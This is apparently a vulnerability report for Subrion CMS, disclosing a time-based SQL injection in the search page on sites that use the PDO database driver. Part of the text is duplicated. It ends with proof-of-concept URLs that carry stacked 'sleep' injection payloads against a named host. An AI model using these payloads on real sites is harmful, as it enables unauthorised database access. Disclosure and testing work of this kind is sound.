I. Vulnerability Analysis
Subrion CMS supports three ways of connecting mysql: mysql, mysqli and PDO. The default is mysqli.
They are executed by three files in the /includes/classes/ directory.
ia.core.mysql.php
ia.core.mysqli.php
ia.core.pdo.php
If a website uses PDO connection, there will be a vulnerability.
II. Vulnerability testing
Using PDO connections requires modifying the file---- /includes/config. inc. php.
Change mysqli to pdo.
I. Vulnerability Analysis
Subrion CMS supports three ways of connecting mysql: mysql, mysqli and PDO. The default is mysqli.
They are executed by three files in the /includes/classes/ directory.
ia.core.mysql.php
ia.core.mysqli.php
ia.core.pdo.php
If a website uses PDO connection, there will be a vulnerability.
II. Vulnerability testing

Using PDO connections requires modifying the file---- /includes/config. inc. php.
Change mysqli to pdo.
In the search page:
http://cms.im/search/
POC and testing:
/search/?q=);select%20sleep(1);--+/search/?q=);select%20sleep(5);--+/search/?q=);select%20sleep(10);--+The text was updated successfully, but these errors were encountered: